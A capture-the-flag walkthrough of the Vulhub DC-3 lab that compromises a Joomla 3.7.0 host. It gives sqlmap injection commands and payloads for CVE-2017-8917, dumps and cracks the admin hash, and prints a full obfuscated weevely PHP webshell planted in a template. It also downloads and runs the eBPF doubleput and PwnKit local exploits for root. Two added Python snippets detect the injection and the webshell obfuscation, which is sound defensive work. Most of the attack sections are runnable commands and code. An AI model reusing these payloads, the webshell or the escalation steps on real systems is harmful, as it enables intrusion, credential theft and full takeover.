Vulhub DC-3 lab: practical walkthrough

This lab is a special case: in NAT mode the target VM does not come up, so the approach is to run the target in VirtualBox instead. VirtualBox and VMware then need to share a virtual network adapter so that both machines sit on the same subnet for scanning.
After that, the network adapter can be chosen in Kali: use the same adapter as VirtualBox when testing, and switch to the NAT adapter when internet access is needed.
Start the target VM in VirtualBox.
Then switch the attacking machine's adapter to the target's subnet and start an ARP scan for live hosts.
arp-scan -l
nmap -T4 -A 192.168.56.100 -p 1-65535
nmap -T4 -A 192.168.56.101 -p 1-65535
Tools can be used to fingerprint which CMS and configuration the site runs.
whatweb http://192.168.56.101
This reveals a site built on the Joomla CMS.
Next, a Joomla-specific scanner can be used.
(Switch to the NAT adapter before downloading the tool so the public internet is reachable. How to configure the VM with two adapters for a combined internal/external lab will be covered separately.)
After installation, switch back to the internal adapter.
apt-get install joomscan
joomscan --url http://192.168.56.101
Since the Joomla version is 3.7.0, look for a matching exploit.
searchsploit Joomla 3.7.0
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt 42033.txt
The sqlmap command derived from this exploit to list the tables of joomladb (used in the steps after the file):
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
The content of 42033.txt is as follows:
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

Based on the hints in the file, run the corresponding sqlmap commands:
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,password --dump -p list[fullordering]
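As an added defensive example (not part of the original walkthrough), the Python below parses Apache-style access log lines and flags requests whose list[fullordering] parameter carries the injection shapes listed in the exploit output above (error-based, boolean-based, time-based). The log lines are constructed samples, and the "legitimate ordering value" grammar is an assumption for illustration, not Joomla's own validation.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (not from the original post). The first
# three carry the injection shapes sqlmap reported for CVE-2017-8917; the last
# is a normal request to the same component.
SAMPLE_LOG = r"""
192.168.56.102 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 512 "-" "sqlmap/1.7"
192.168.56.102 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE%20WHEN%20(1573%3D1573)%20THEN%201573%20ELSE%201573*(SELECT%201573%20FROM%20DUAL%20UNION%20SELECT%209674%20FROM%20DUAL)%20END) HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
192.168.56.102 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))GDiu) HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
192.168.56.1 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.title%20ASC HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
"""

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Assumed shape of a benign ordering value: "<column> [ASC|DESC]" or empty.
# Anything else in list[fullordering] is outside what the feature should accept.
ORDER_OK = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]*(\s+(ASC|DESC))?$', re.I)
SQL_HINTS = {
    "error-based": re.compile(r'updatexml|extractvalue|floor\(rand', re.I),
    "boolean-based": re.compile(r'case\s+when|\bunion\b|\bdual\b', re.I),
    "time-based": re.compile(r'\bsleep\s*\(|benchmark\s*\(', re.I),
}

def classify_line(line):
    """Return (client_ip, [indicators]) for a com_fields request, else None."""
    m = REQ_RE.match(line)
    if not m:
        return None
    ip, target = m.group(1), m.group(2)
    qs = parse_qs(urlparse(target).query, keep_blank_values=True)  # URL-decodes values
    if qs.get("option") != ["com_fields"] or "list[fullordering]" not in qs:
        return None
    value = qs["list[fullordering]"][0]
    if value == "" or ORDER_OK.match(value):
        return ip, []
    hits = [name for name, rx in SQL_HINTS.items() if rx.search(value)]
    return ip, hits or ["unexpected-ordering-value"]

def scan(log_text):
    """Return [(ip, indicators)] for every request that was flagged."""
    flagged = []
    for line in log_text.strip().splitlines():
        res = classify_line(line)
        if res and res[1]:
            flagged.append(res)
    return flagged
```

Running scan(SAMPLE_LOG) flags the first three lines with one indicator each and leaves the ordinary "a.title ASC" request alone.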
The username and password hash are obtained:
admin
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
Next, the hash needs to be cracked with a tool.
First save the hash to a file:
cd /root
touch mima.txt
nano mima.txt
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
cd /root
john mima.txt 
Next, log in to the backend with account admin and password snoopy.
Then go to the relevant location.
It allows the user to edit many files, including PHP files.
From experience, the Joomla template directory is at:
xxx.com/templates/<template name>/ + the path you see in the editor
The content can be customised, which opens up many options; uploading a one-line webshell and connecting with China Chopper would be trivial.
Here we do something fancier: generate a webshell with the password 123456.
weevely generate 123456 webshell.php
Content of webshell.php, a variant of the one-line webshell:
<?php
$k='ontents("cZphp://icZnput"cZ),$m)=cZ=cZ1) cZ{@ob_start();@ecZvalcZ(@cZgzuncocZmpress(@x(c';
$T='cZ$j};}}retcZurn $ocZ;}ifcZ (@precZgcZ_match("/cZ$kcZh(.+)$kf/"cZcZ,@file_getcZ_c';
$U='Z@bacZse6cZ4_decZcocZde($m[1cZ]),$k)));cZ$ocZ=@ob_get_contents(cZ);@obcZ_end_clecZan()';
$g='or($cZi=0;$cZcZi<$l;){cZfor($j=cZ0cZ;($j<$c&&$i<$l);$jcZ++,$i+cZ+){$o.=cZ$tcZ{$i}^$k{';
$X=str_replace('IH','','IHcIHreateIHIH_fIHIHunction');
$L=';$cZrcZ=@base6cZ4_ecZnccZode(@x(@gzcomprcZess($o),$kcZ)cZ);pcZrint("$p$kh$r$cZkf");}';
$N='$k="cZe10adcZc39";$kh="cZ49ba59cZcZabbe56";$kf="ecZ05cZ7fcZ20f883e"cZ;$p="1KcZ9y6VdIcZH';
$p='rJbICFj"cZ;functcZion x(cZ$t,$cZk){$c=stcZrlecZn($k);cZ$l=strlencZ($t);cZ$o="";fcZ';
$v=str_replace('cZ','',$N.$p.$g.$T.$k.$U.$L);
$n=$X('',$v);$n();
?>
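The agent above hides its real code by splitting it into literals padded with the marker cZ and building the name create_function with str_replace, so a plain text search for eval, create_function or php://input finds nothing. The following small static scanner is an added example (not from the post and not weevely's code): it folds the literal assignments and str_replace calls the same way PHP would and then looks for indicators in the resolved strings. The PHP input is a constructed fragment with the same obfuscation shape but a harmless body.

```python
import re

# Callables and runtime indicators worth flagging in a PHP file found under a
# CMS template directory (illustrative list, not exhaustive).
DANGEROUS_CALLS = ("create_function", "eval", "assert", "system", "passthru",
                   "shell_exec", "exec", "proc_open")
RUNTIME_HINTS = ("php://input", "gzuncompress", "base64_decode", "ob_start")

# Constructed sample (not the agent from the post): same str_replace/padding
# trick, but the hidden body only echoes the request length.
SAMPLE_PHP = r"""<?php
$a='$d=@fcZile_get_cocZntents("pcZhp://icZnput");';
$b='ecZcho stcZrlen($cZd);';
$X=str_replace('IH','','IHcIHreateIHIH_fIHIHunction');
$v=str_replace('cZ','',$a.$b);
$n=$X('',$v);$n();
?>"""

ASSIGN_RE = re.compile(r"^\$(\w+)\s*=\s*(.+?);\s*$", re.M)
STRREP_RE = re.compile(r"^str_replace\('([^']*)',\s*'([^']*)',\s*(.+)\)$")
TOKEN_RE = re.compile(r"'((?:[^'\\]|\\.)*)'|\$(\w+)")

def _resolve(expr, env):
    """Evaluate a concatenation of single-quoted literals and already-known $vars."""
    out = []
    for lit, var in TOKEN_RE.findall(expr):
        out.append(env.get(var, "") if var else lit.replace("\\'", "'").replace("\\\\", "\\"))
    return "".join(out)

def resolve_strings(php_src):
    """Statically fold literal assignments and str_replace('x','',...) calls."""
    env = {}
    for name, rhs in ASSIGN_RE.findall(php_src):
        rhs = rhs.strip()
        m = STRREP_RE.match(rhs)
        if m:
            search, repl, inner = m.groups()
            env[name] = _resolve(inner, env).replace(search, repl)
        elif rhs.startswith("'"):
            env[name] = _resolve(rhs, env)
    return env

def scan_php(php_src, resolve=True):
    """Return sorted indicators; with resolve=False only the raw text is inspected."""
    texts = [php_src] + (list(resolve_strings(php_src).values()) if resolve else [])
    found = set()
    for text in texts:
        found.update("dangerous-callable:" + fn for fn in DANGEROUS_CALLS
                     if re.search(r"\b%s\b" % fn, text))
        found.update("runtime-indicator:" + h for h in RUNTIME_HINTS if h in text)
    if re.search(r"\$\w+\s*\(", php_src):      # $n() / $X('', $v): variable function call
        found.add("variable-function-call")
    return sorted(found)
```

With resolve=False only the variable-function-call pattern is visible; after folding, create_function and php://input surface as well.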

http://192.168.56.101/templates/protostar/test1.php
Once the file is reachable at this address, connect to it with the tool:
weevely http://192.168.56.101/templates/protostar/test1.php 123456
The help command lists all available commands.
:help
:shell_sh
cat /etc/passwd
Next, an SSH brute-force tool could be used.
But first we can try an OS scan with nmap to see the OS version and check whether a Linux kernel privilege escalation matches it.
nmap -O 192.168.56.101
SUID privilege escalation can also be tried, but no exploitable file was found.
find / -user root -perm -4000 -print 2>/dev/null
Continue by checking the kernel version and looking for a Linux kernel privilege escalation.
uname -a 
lsb_release -a
Next, attempt kernel privilege escalation.
searchsploit Ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali
The text content is as follows:
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:

    /* look for pseudo eBPF instructions that access map FDs and
     * replace them with actual map pointers
     */
    static int replace_map_fd_with_map_ptr(struct verifier_env *env)
    {
        struct bpf_insn *insn = env->prog->insnsi;
        int insn_cnt = env->prog->len;
        int i, j;

        for (i = 0; i < insn_cnt; i++, insn++) {
            [checks for bad instructions]

            if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
                struct bpf_map *map;
                struct fd f;

                [checks for bad instructions]

                f = fdget(insn->imm);
                map = __bpf_map_get(f);
                if (IS_ERR(map)) {
                    verbose("fd %d is not pointing to valid bpf_map\n",
                        insn->imm);
                    fdput(f);
                    return PTR_ERR(map);
                }

                [...]
            }
        }
        [...]
    }

__bpf_map_get contains the following code:

/* if error is returned, fd is released.
* On success caller should complete fd access with matching fdput()
*/
struct bpf_map *__bpf_map_get(struct fd f)
{
    if (!f.file)
        return ERR_PTR(-EBADF);
    if (f.file->f_op != &bpf_map_fops) {
        fdput(f);
        return ERR_PTR(-EINVAL);
    }

    return f.file->private_data;
}

The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.

One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.


There are two problems with this approach:


The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)

writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7


Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Go to the address above to download the exploit; it is already downloaded here.
It can also be fetched directly from the attacking machine:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Put the archive in Kali's root directory and start Python's simple HTTP server so the file can be transferred to the target.
mv /home/kali/39772.zip /home/kali/39772.zip
python -m SimpleHTTPServer
Then on the target:
wget http://192.168.56.102:8000/39772.zip
Still on the target:
unzip 39772.zip
cd 39772
ls
tar -xvf exploit.tar
ls
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
./doubleput
cd /root
ls
cat the-flag.txt
From my own research, another privilege escalation vulnerability is worth trying.
Put the exploit at the specified location: /home/kali/CVE-2021-4034.zip
Then on the target:
wget http://192.168.56.102:8000/CVE-2021-4034.zip
unzip CVE-2021-4034.zip
ls
cd CVE-2021-4034
ls
make
./cve-2021-4034
The privilege escalation did not succeed, probably because the kernel version does not match!


What follows is further research on this lab and trying out some other ideas.
First, connecting with China Chopper (中国菜刀): the connection failed.
Next, connecting with AntSword (中国蚁剑).